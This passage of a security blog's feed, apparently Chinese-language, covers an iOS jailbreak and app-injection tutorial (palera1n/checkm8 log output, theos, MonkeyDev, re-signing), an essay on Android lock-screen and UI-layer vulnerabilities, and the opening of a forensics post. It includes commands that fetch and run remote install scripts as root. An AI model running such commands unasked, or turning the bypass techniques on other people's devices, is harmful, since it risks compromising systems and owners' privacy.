&lt;td&gt;&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;Apple T2 MacBookPro16,1&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;Apple T2 MacBookPro16,2&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;Apple T2 MacBookPro16,3&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;Apple T2 MacBookPro16,4&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;Apple T2 iMacPro1,1&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;Apple T2 Macmini8,1&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;Apple T2 MacPro7,1&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;iBridge2,11 (Unknown Mac)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;iBridge2,13 (Unknown Mac)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;下载地址在 &lt;a href=&quot;https://github.com/palera1n/palera1n/releases&quot;&gt;github release&lt;/a&gt;，以无根&lt;code&gt;rootless&lt;/code&gt;越狱模式执行，如下：&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;# 避免各种报错
# 执行权限
$ chmod +x ./palera1n-macos-universal
# 清除附加属性
$ xattr -c ./palera1n-macos-universal
# 执行
$ ./palera1n-macos-universal -l
#
# palera1n: v2.0
#
# ========  Made by  =======
# Made by: Nick Chan, Ploosh, Khcrysalis, Mineek, staturnz, kok3shidoll, HAHALOSAH
# ======== Thanks to =======
# Thanks to: llsc12, Nebula, Lrdsnow, nikias (libimobiledevice),
# checkra1n team (Siguza, axi0mx, littlelailo et al.),
# Procursus Team (Hayden Seay, Cameron Katri, Keto et.al)
# ==========================

 - [09/11/24 17:58:32] &amp;lt;Info&amp;gt;: Waiting for devices
 - [09/11/24 17:58:32] &amp;lt;Info&amp;gt;: Entering recovery mode
 - [09/11/24 17:58:44] &amp;lt;Info&amp;gt;: Press Enter when ready for DFU mode

Hold volume down + side button (0)
Hold volume down button (4)
 - [09/11/24 17:58:56] &amp;lt;Info&amp;gt;: Device entered DFU mode successfully
 - [09/11/24 17:58:57] &amp;lt;Info&amp;gt;: About to execute checkra1n
#
# Checkra1n 0.1337.2
#
# Proudly written in nano
# (c) 2019-2023 Kim Jong Cracks
#
#========  Made by  =======
# argp, axi0mx, danyl931, jaywalker, kirb, littlelailo, nitoTV
# never_released, nullpixel, pimskeks, qwertyoruiop, sbingner, siguza
#======== Thanks to =======
# haifisch, jndok, jonseals, xerub, lilstevie, psychotea, sferrini
# Cellebrite (ih8sn0w, cjori, ronyrus et al.)
#==========================

 - [09/11/24 17:58:57] &amp;lt;Verbose&amp;gt;: Starting thread for Apple TV 4K Advanced board
 - [09/11/24 17:58:57] &amp;lt;Info&amp;gt;: Waiting for DFU mode devices
 - [09/11/24 17:58:57] &amp;lt;Verbose&amp;gt;: DFU mode device found
 - [09/11/24 17:58:57] &amp;lt;Info&amp;gt;: Checking if device is ready
 - [09/11/24 17:58:57] &amp;lt;Verbose&amp;gt;: Attempting to perform checkm8 on 8015 11
 - [09/11/24 17:58:57] &amp;lt;Info&amp;gt;: Setting up the exploit
 - [09/11/24 17:58:57] &amp;lt;Verbose&amp;gt;: == checkm8 setup stage ==
 - [09/11/24 17:58:57] &amp;lt;Verbose&amp;gt;: Entered initial checkm8 state after 1 steps
 - [09/11/24 17:58:57] &amp;lt;Verbose&amp;gt;: Stalled input endpoint after 1 steps
 - [09/11/24 17:58:58] &amp;lt;Verbose&amp;gt;: DFU mode device disconnected
 - [09/11/24 17:58:58] &amp;lt;Verbose&amp;gt;: DFU mode device found
 - [09/11/24 17:58:58] &amp;lt;Verbose&amp;gt;: == checkm8 trigger stage ==
 - [09/11/24 17:58:58] &amp;lt;Info&amp;gt;: Checkmate!
 - [09/11/24 17:58:58] &amp;lt;Verbose&amp;gt;: Device should now reconnect in download mode
 - [09/11/24 17:58:58] &amp;lt;Verbose&amp;gt;: DFU mode device disconnected
 - [09/11/24 17:59:18] &amp;lt;Error&amp;gt;: Timed out waiting for download mode (error code: -status_exploit_timeout_error)
 - [09/11/24 18:00:32] &amp;lt;Info&amp;gt;: Entered download mode
 - [09/11/24 18:00:32] &amp;lt;Verbose&amp;gt;: Download mode device found
 - [09/11/24 18:00:32] &amp;lt;Info&amp;gt;: Booting PongoOS...
 - [09/11/24 18:00:34] &amp;lt;Info&amp;gt;: Found PongoOS USB Device
 - [09/11/24 18:00:35] &amp;lt;Info&amp;gt;: Booting Kernel...
&lt;/code&gt;&lt;/pre&gt;
&lt;h3&gt;1.2. Checkra1n&lt;/h3&gt;
&lt;p&gt;&lt;a href=&quot;https://checkra.in/&quot;&gt;Checkra1n&lt;/a&gt;越狱支持&lt;code&gt;A5-A17&lt;/code&gt;设备，&lt;code&gt;iOS 16.6 - iOS 17.x.x&lt;/code&gt;系统。（注意有很多仿冒域名）&lt;/p&gt;
&lt;p&gt;如果提示无法使用，可以尝试勾选&lt;code&gt;options&lt;/code&gt;的选项。&lt;/p&gt;
&lt;h2&gt;2. 砸壳&lt;/h2&gt;
&lt;h3&gt;2.1. frida-ios-dump&lt;/h3&gt;
&lt;h2&gt;3. 头文件导出&lt;/h2&gt;
&lt;h2&gt;4. HOOK 及动态库注入&lt;/h2&gt;
&lt;h3&gt;4.1. theos 编译工具及 tweak&lt;/h3&gt;
&lt;h4&gt;4.1.1. tweak 安装环境及编译过程&lt;/h4&gt;
&lt;pre&gt;&lt;code&gt;# 安装theos
$ sudo git clone --recursive https://github.com/theos/theos.git /opt/theos
# 安装ldid
$ brew install ldid
# 环境
$ export PATH=/opt/theos/bin:$PATH
$ export THEOS=/opt/theos
# 根据命令行提示创建tweak项目
$ /opt/theos/bin/nic.pl
NIC 2.0 - New Instance Creator
------------------------------
[1.] iphone/activator_event
[2.] iphone/activator_listener
[3.] iphone/application
[4.] iphone/application_swift
[5.] iphone/application_swiftui
[6.] iphone/control_center_module-11up
[7.] iphone/cydget
[8.] iphone/flipswitch_switch
[9.] iphone/framework
[10.] iphone/library
[11.] iphone/notification_center_widget
[12.] iphone/notification_center_widget-7up
[13.] iphone/null
[14.] iphone/preference_bundle
[15.] iphone/preference_bundle_swift
[16.] iphone/theme
[17.] iphone/tool
[18.] iphone/tool_swift
[19.] iphone/tweak
[20.] iphone/tweak_swift
[21.] iphone/tweak_with_simple_preferences
[22.] iphone/xpc_service
[23.] iphone/xpc_service_modern
Choose a Template (required): 19
Project Name (required): aaa # 注入包的名字
Package Name [com.yourcompany.aaa]: bbb.ccc # 注入包的名字
Author/Maintainer Name [ddd]: ddd # 作者名
[iphone/tweak] MobileSubstrate Bundle filter [com.apple.springboard]: com.apple.springboard # 目标包名
[iphone/tweak] List of applications to terminate upon installation (space-separated, &apos;-&apos; for none) [SpringBoard]: SpringBoard # 目标应用名
Instantiating iphone/tweak in aaa/...
Done.
# 编译
make clean &amp;amp;&amp;amp; make
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;其中，原始&lt;code&gt;makefile&lt;/code&gt;如下：&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;TARGET := iphone:clang:latest:7.0
INSTALL_TARGET_PROCESSES = &apos;SpringBoard&apos;


include $(THEOS)/makefiles/common.mk

TWEAK_NAME = aaa

aaa_FILES = Tweak.x
aaa_CFLAGS = -fobjc-arc

include $(THEOS_MAKE_PATH)/tweak.mk
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;通过对&lt;code&gt;makefile&lt;/code&gt;编译选项配置实现项目定制化编译，其中可能用到的配置如：&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;指定处理器架构：ARCHS = armv7 arm64&lt;/li&gt;
&lt;li&gt;指定 SDK 版本：TARGET = iphone:latest:8.0&lt;/li&gt;
&lt;/ul&gt;
&lt;h4&gt;4.1.2. tweak 代码编写及 Logos&lt;/h4&gt;
&lt;h2&gt;5. 打包、重签名、安装&lt;/h2&gt;
&lt;h3&gt;5.1. MonkeyDev 打包&lt;/h3&gt;
&lt;p&gt;&lt;a href=&quot;https://github.com/AloneMonkey/MonkeyDev&quot;&gt;MonkeyDev&lt;/a&gt; 是&lt;code&gt;iOS&lt;/code&gt;集成开发环境，支持越狱和非越狱情况下的多种注入模式，且完美适配&lt;code&gt;iOS&lt;/code&gt;打包签名流程。&lt;code&gt;MonkeyDev&lt;/code&gt;内部自带砸壳支持，使用前需要先按说明进行配置&lt;a href=&quot;https://github.com/AloneMonkey/frida-ios-dump&quot;&gt;frida-ios-dump&lt;/a&gt;。&lt;/p&gt;
&lt;h4&gt;5.1.1. 安装与卸载&lt;/h4&gt;
&lt;ol&gt;
&lt;li&gt;安装最新的&lt;code&gt;theos&lt;/code&gt;和&lt;code&gt;ldid&lt;/code&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;pre&gt;&lt;code&gt;# 安装theos
$ sudo git clone --recursive https://github.com/theos/theos.git /opt/theos
# 安装ldid
$ brew install ldid
# 环境
$ export PATH=/opt/theos/bin:$PATH
$ export THEOS=/opt/theos
&lt;/code&gt;&lt;/pre&gt;
&lt;ol&gt;
&lt;li&gt;在越狱环境下需要配置免密码登录&lt;/li&gt;
&lt;/ol&gt;
&lt;pre&gt;&lt;code&gt;$ ssh-keygen -t rsa -P &apos;&apos;
$ ssh-copy-id -i /Users/username/.ssh/id_rsa root@ip
&lt;/code&gt;&lt;/pre&gt;
&lt;ol&gt;
&lt;li&gt;安装 MonkeyDev 集成环境&lt;/li&gt;
&lt;/ol&gt;
&lt;pre&gt;&lt;code&gt;# 指定xcode
$ sudo xcode-select -s /Applications/Xcode-beta.app
# 指定默认xcode
$ xcode-select -p
# 安装
$ sudo /bin/sh -c &quot;$(curl -fsSL https://raw.githubusercontent.com/AloneMonkey/MonkeyDev/master/bin/md-install)&quot;
# 更新
$ sudo /bin/sh -c &quot;$(curl -fsSL https://raw.githubusercontent.com/AloneMonkey/MonkeyDev/master/bin/md-update)&quot;
# 卸载
$ sudo /bin/sh -c &quot;$(curl -fsSL https://raw.githubusercontent.com/AloneMonkey/MonkeyDev/master/bin/md-uninstall)&quot;
&lt;/code&gt;&lt;/pre&gt;
&lt;h4&gt;5.1.2. MonkeyDev 环境配置&lt;/h4&gt;
&lt;p&gt;一般使用默认配置，同样可以在&lt;code&gt;~/.zshrc&lt;/code&gt;或者&lt;code&gt;~/.bash_profile&lt;/code&gt;配置文件中设置导出环境变量，如:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;export MonkeyDevDeviceIP=localhost
export MonkeyDevDevicePort=22
&lt;/code&gt;&lt;/pre&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;设置项&lt;/th&gt;
&lt;th&gt;意义&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;MonkeyDevBuildPackageOnAnyBuild&lt;/td&gt;
&lt;td&gt;每次 build 都生成 deb 包&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;MonkeyDevCopyOnBuild&lt;/td&gt;
&lt;td&gt;build 的时将 deb 包拷贝到设备的/var/root/MonkeyDevBuilds/目录&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;MonkeyDevDeviceIP&lt;/td&gt;
&lt;td&gt;目标设备的 ip 地址，默认 USB 连接，localhost&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;MonkeyDevDevicePort&lt;/td&gt;
&lt;td&gt;目标设备的端口，默认 22&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;MonkeyDevDevicePassword&lt;/td&gt;
&lt;td&gt;目标设备的 ssh 登录密码，默认为空使用免密码登录&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;MonkeyDevInstallOnAnyBuild&lt;/td&gt;
&lt;td&gt;每次 build 都将 deb 安装到设备&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;MonkeyDevInstallOnProfiling&lt;/td&gt;
&lt;td&gt;点击 Profile 才将 deb 安装到设备&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;MonkeyDevKillProcessOnInstall&lt;/td&gt;
&lt;td&gt;安装的时候杀掉指定的进程，填写进程名&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;MonkeyDevClearUiCacheOnInstall&lt;/td&gt;
&lt;td&gt;安装时 clear uicache&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;MonkeyDevPath&lt;/td&gt;
&lt;td&gt;MonkeyDev 的安装路径，默认的，不用修改&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;MonkeyDevTheosPath&lt;/td&gt;
&lt;td&gt;theos 的安装路径&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;h4&gt;5.1.3. 创建工程&lt;/h4&gt;
&lt;ol&gt;
&lt;li&gt;在&lt;code&gt;xcode&lt;/code&gt;里点击&lt;code&gt;File - New - Project...&lt;/code&gt;创建&lt;code&gt;iOS&lt;/code&gt;项目，选择&lt;code&gt;MonkeyApp&lt;/code&gt;。&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;img src=&quot;image.png&quot; alt=&quot;alt text&quot; /&gt;&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;然后填写&lt;code&gt;Product Name&lt;/code&gt;，在&lt;code&gt;Target App&lt;/code&gt;填写目标&lt;code&gt;App&lt;/code&gt;的名字或者&lt;code&gt;bundle id&lt;/code&gt;，工具将会自动使用&lt;a href=&quot;https://github.com/AloneMonkey/frida-ios-dump&quot;&gt;frida-ios-dump&lt;/a&gt;提取&lt;code&gt;ipa&lt;/code&gt;文件，如果是非越狱环境集成 APP，可忽略&lt;code&gt;Target App&lt;/code&gt;，如下所示:&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;img src=&quot;image-1.png&quot; alt=&quot;alt text&quot; /&gt;&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;在项目中将砸壳后的&lt;code&gt;ipa&lt;/code&gt;文件拖至&lt;code&gt;TargetApp&lt;/code&gt;中，同样有一些参数需要被关注，如下所示：&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;img src=&quot;image-4.png&quot; alt=&quot;alt text&quot; /&gt;&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;参数&lt;/th&gt;
&lt;th&gt;含义&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;ENABLE_BITCODE&lt;/td&gt;
&lt;td&gt;支持 Bitcode 编译&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;MONKEYDEV_ADD_SUBSTRATE&lt;/td&gt;
&lt;td&gt;添加 MobileSubstrate&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;MONKEYDEV_CLASS_DUMP&lt;/td&gt;
&lt;td&gt;使用 frida-ios-dump 提取类名&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;MONKEYDEV_DEFAULT_BUNDLEID&lt;/td&gt;
&lt;td&gt;使用 info.plist 中的 bundleID 而非项目 bundleID&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;MONKEYDEV_INSERT_DYLIB&lt;/td&gt;
&lt;td&gt;支持动态库插入&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;MONKEYDEV_RESTORE_SYMBOL&lt;/td&gt;
&lt;td&gt;保留编译符号&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;MONKEYDEV_TARGET_APP&lt;/td&gt;
&lt;td&gt;指定砸壳应用&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;PODS_CONFIGURATION_BUILD_DIR&lt;/td&gt;
&lt;td&gt;Pods 构建配置目录&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;PODS_ROOT&lt;/td&gt;
&lt;td&gt;Pods 根目录&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;ol&gt;
&lt;li&gt;&lt;code&gt;monkeydev&lt;/code&gt;本身支持注入代码编写，同时支持多种注入框架&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;如步骤 3 图所示，&lt;code&gt;bbbDyib&lt;/code&gt;是注入代码编写位置&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;bbbDyib.h&lt;/code&gt;、&lt;code&gt;bbbDyib.m&lt;/code&gt;：原生注入框架&lt;/li&gt;
&lt;li&gt;&lt;code&gt;Logos&lt;/code&gt;：&lt;code&gt;tweak&lt;/code&gt;框架&lt;/li&gt;
&lt;li&gt;&lt;code&gt;Config&lt;/code&gt;：这个是&lt;code&gt;cycript&lt;/code&gt;的一些脚本下载以及&lt;code&gt;methodtrace&lt;/code&gt;配置代码&lt;/li&gt;
&lt;li&gt;&lt;code&gt;LLDBTools&lt;/code&gt;：这个是用于&lt;code&gt;LLDB&lt;/code&gt;调试的代码，比如&lt;code&gt;po pviews()&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;AntiAntiDebug&lt;/code&gt;：这个里面是反反调试的代码&lt;/li&gt;
&lt;li&gt;&lt;code&gt;fishhook&lt;/code&gt;：这个是自动集成的&lt;code&gt;fishhook&lt;/code&gt;模块&lt;/li&gt;
&lt;/ul&gt;
&lt;ol&gt;
&lt;li&gt;编译后打包成&lt;code&gt;ipa&lt;/code&gt;文件，直接调用&lt;code&gt;项目目录/LatestBuild/createIPA.command&lt;/code&gt;即可&lt;/li&gt;
&lt;/ol&gt;
&lt;h3&gt;5.2. iOS APP Signer 重签名&lt;/h3&gt;
&lt;p&gt;软件比较简单易用，按顺序选择输入&lt;code&gt;ipa&lt;/code&gt;文件，选择签名证书，选择&lt;code&gt;Provisioning Profile&lt;/code&gt;，然后点击&lt;code&gt;start&lt;/code&gt;即可。&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;image-3.png&quot; alt=&quot;alt text&quot; /&gt;&lt;/p&gt;
&lt;h3&gt;5.3. 安装&lt;/h3&gt;
&lt;p&gt;通过 xcode 安装或者使用三方工具安装（如爱思）,如果安装不成功且无有效日志，可以通过控制台查看设备日志，进程名为&lt;code&gt;installd&lt;/code&gt;：&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;image-2.png&quot; alt=&quot;alt text&quot; /&gt;&lt;/p&gt;
&lt;h2&gt;6. 参考文献&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/AloneMonkey/MonkeyDev&quot;&gt;AloneMonkey/MonkeyDev: CaptainHook Tweak、Logos Tweak and Command-line Tool、Patch iOS Apps, Without Jailbreak.&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/theos/theos&quot;&gt;theos/theos: A cross-platform suite of tools for building and deploying software for iOS and other platforms.&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/TKkk-iOSer/TKTweakDemo&quot;&gt;TKkk-iOSer/TKTweakDemo: iOS 逆向 -- 简单 hook 微信，实现 hello World&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/AloneMonkey/frida-ios-dump&quot;&gt;AloneMonkey/frida-ios-dump: pull decrypted ipa from jailbreak device&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/DanTheMan827/ios-app-signer&quot;&gt;DanTheMan827/ios-app-signer: This is an app for OS X that can (re)sign apps and bundle them into ipa files that are ready to be installed on an iOS device.&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://www.i4.cn/&quot;&gt;爱思助手&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://checkra.in/&quot;&gt;checkra1n&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://palera.in/&quot;&gt;palera1n&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://medium.com/@q1539350820/ios-osx%E9%80%86%E5%90%91%E5%8E%BB%E9%99%A4%E5%BA%94%E7%94%A8bundleid%E6%A0%A1%E9%AA%8C-ff63444e1282&quot;&gt;IOS+OSX 逆向去除应用 Bundleid 校验&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://blog.csdn.net/WangErice/article/details/102611355&quot;&gt;应用代码注入&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
</content:encoded></item><item><title>note</title><link>https://picoorg.github.io/posts/note/</link><guid isPermaLink="true">https://picoorg.github.io/posts/note/</guid><pubDate>Thu, 12 Sep 2024 00:00:00 GMT</pubDate><content:encoded>&lt;p&gt;不会 Android 开发的人，能不能挖到 Android 系统的漏洞？&lt;/p&gt;
&lt;p&gt;先说结论，可以，但是能挖到的漏洞类型肯定有局限&lt;/p&gt;
&lt;p&gt;其实我觉得关键的反而不是技术实力，是能不能判断出漏洞
很多人都觉得，系统安全漏洞这种东西，肯定很复杂，肯定都是内存破坏什么的，都是什么缓冲区溢出、释放后使用这种一听就很高大上的东西，包括我自己以前也这么以为
其实 Android 系统很多漏洞都不是内存问题，反而有很多的 UI 层漏洞，有些问题甚至不用写代码就能触发，看你对系统的熟悉程度
举个例子，2022 年那个价值 7 万美元的锁屏密码绕过漏洞 CVE-2022-20465，这就是纯粹的 UI 层漏洞，不用写一行代码就能触发，能在没有锁屏密码的情况下解锁设备，很明显这是漏洞，对吧？那其他看着没那么明显的东西，有没有可能也是漏洞？&lt;/p&gt;
&lt;p&gt;今年八月有个漏洞 CVE-2024-34734，触发方式是在设备锁屏的时候下拉状态栏，里面有个“活跃的应用”，旁边有个“停止”按钮，用这种方式可以在没有密码的情况下杀掉 VPN 应用。可能看起来它不像漏洞，但是它能让没有密码的人停止掉 VPN，假如机主没有注意到 VPN 已经停止，继续使用网络，这个时候是不是就在用非预期的不安全网络？&lt;/p&gt;
&lt;p&gt;Android 系统还有一个功能叫多用户，效果很明显，可以让多个人共用一台手机。NFC 设置里有个选项，只允许锁屏解锁之后使用 NFC，术语叫 secure nfc。假如机主打开了 secure nfc，切到访客用户然后给另一个人借用手机，这个人进设置里关掉了 secure nfc，然后切到机主用户，不输密码，是不是也能用机主的 NFC 支付了（CVE-2021-39807）？类似的还有访客用户帮你降级系统应用、添加 WIFI 网络等等。&lt;/p&gt;
&lt;p&gt;Android 12 开始有个功能，有应用在录音或者录像的时候，状态栏右边会显示一个绿色的小点来提醒你，正式的名称叫“隐私指示器”。假如你平常用手机的时候，发现在某个应用里录音或者拍照的时候，这个指示器没出来，那你也可以去报漏洞。更进一步，这个指示器是 SystemUI 显示的，假如录音到一半 SystemUI 进程死掉了，那重启之后这个绿点还会不会显示（CVE-2024-0019）？&lt;/p&gt;
&lt;p&gt;还有个功能叫屏幕固定，英语叫 app pinning，作用是借给别人手机的时候把手机固定在某个应用，比如借给别人打电话的时候你肯定不想让他进你支付宝里转钱。还可以设置退出这个状态时必须输入密码。那如果有办法在无密码的时候退出这个状态，也会被认为是漏洞。那假如说在这个状态下，被固定的应用被卸载了会发生什么（CVE-2020-0024）？&lt;/p&gt;
&lt;p&gt;上面这种情况还有很多，比如如果在锁屏页面能查看隐藏起来的通知，那也算漏洞，看你的想象力够不够丰富。还可以玩排列组合，比如 Secure NFC 那个漏洞，访客用户不允许去改这个设置，那普通的第二用户应不应该去改（CVE-2023-21086）？锁屏的时候不能断开 VPN 了，那访客用户能不能断开主用户的 VPN？用屏幕固定这个功能固定了一个应用，那能不能下拉状态栏，在“活跃的应用”里停止当前应用，从而退出屏幕固定？&lt;/p&gt;
&lt;p&gt;所以其实我认为关键点在于：1. 能不能想象到威胁场景 2. 看见一个东西能不能判断出它有没有安全风险。Android 给的漏洞赏金还是挺多的，高质量的高危漏洞报告基本上就是 7000 美刀。打个五折，不算税费，还有 3500 刀，按今天的汇率换算成人民币大概是 25000，一个月花 1000 也够花两年多了。如果真的有人对这方面感兴趣，可以关注我的博客跟频道，后续也会推送相关内容。&lt;/p&gt;
&lt;p&gt;挺讽刺的，我昨天才说关键是“识别威胁场景”，今天就发现自己丢了一个 7000
https://android.googlesource.com/platform/packages/modules/RemoteKeyProvisioning/+/c65dce4c6d8d54e47dce79a56e29e2223a2354e6^!/#F0
这个漏洞我们很早就注意到了，但是研究之后觉得没有安全风险就没报，结果是高危漏洞&lt;/p&gt;
&lt;p&gt;冷知识：Android 中的非 root 用户也可以用系统 shell 命令，如 am pm 等。&lt;/p&gt;
&lt;p&gt;在 termux 等虚拟终端中使用 pm 等命令会提示 service: Failure calling service xxx （图 1），这并非是说普通 uid 不可使用 shell command ，实际上是因为 shell command 是一个 binder 调用，它会发送调用进程的 stdin, stdout, stderr ，也就是 fd 0, 1, 2 到系统服务，但是如果这三个 fd 有某个是系统服务无法访问的，就会导致 binder 调用失败。一般来说，SELinux 会导致 fd 传递失败。app 域的 devpts 是无法被系统服务访问的，因为没有相关的规则。&lt;/p&gt;
&lt;p&gt;因此在没有任何特权的情况下访问 shell command 的正确姿势是提供系统可访问的 fd ，一般来说 app 域的 pipe 都可以被系统访问，因为系统和 app 可能需要通过 pipe 通信。在 shell 中最简单的方法如下（图 2）：&lt;/p&gt;
&lt;p&gt;pm &amp;lt;/dev/null 2&amp;gt;&amp;amp;1 | cat&lt;/p&gt;
&lt;p&gt;思考题（请大家思考，欢迎留言）： 0. 这样访问 shell command 是以 shell 的身份还是 app 的身份？是否构成安全威胁？&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;重定向到文件是否可以正常访问 shell command？App 私有存储(/data)或者扩展存储(/sdcard) 哪一个可用？&lt;/li&gt;
&lt;li&gt;pm install 命令对传入的 apk 路径同样有权限的要求，请尝试解释原因。&lt;/li&gt;
&lt;li&gt;为什么安装了 ksu 或 apatch 后上述限制就消失了？&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;https://github.com/termux/termux-packages/discussions/8292&lt;/p&gt;
</content:encoded></item><item><title>qcow2取证分析环境构建</title><link>https://picoorg.github.io/posts/qcow2%E5%8F%96%E8%AF%81%E5%88%86%E6%9E%90%E7%8E%AF%E5%A2%83%E6%9E%84%E5%BB%BA/</link><guid isPermaLink="true">https://picoorg.github.io/posts/qcow2%E5%8F%96%E8%AF%81%E5%88%86%E6%9E%90%E7%8E%AF%E5%A2%83%E6%9E%84%E5%BB%BA/</guid><description>在日常工作中，难免遇到一些镜像分析工作，当我们采用人工分析时，需要的常见命令在本文中进行总结。</description><pubDate>Fri, 30 Aug 2024 00:00:00 GMT</pubDate><content:encoded>&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;#qcow2%E5%8F%96%E8%AF%81%E5%88%86%E6%9E%90%E7%8E%AF%E5%A2%83%E6%9E%84%E5%BB%BA&quot;&gt;QCOW2取证分析环境构建&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;#%E4%B8%80qcow2%E7%AE%80%E4%BB%8B&quot;&gt;一、QCOW2简介&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#%E4%BA%8Cqemu-img%E7%9A%84%E5%9F%BA%E6%9C%AC%E4%BD%BF%E7%94%A8&quot;&gt;二、qemu-img的基本使用&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#%E4%B8%89%E5%88%86%E6%9E%90%E7%8E%AF%E5%A2%83%E6%9E%84%E5%BB%BA&quot;&gt;三、分析环境构建&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;#31-%E6%96%87%E4%BB%B6%E7%B3%BB%E7%BB%9F%E6%8C%82%E8%BD%BD&quot;&gt;3.1 文件系统挂载&lt;/a&gt;&lt;/li&gt;
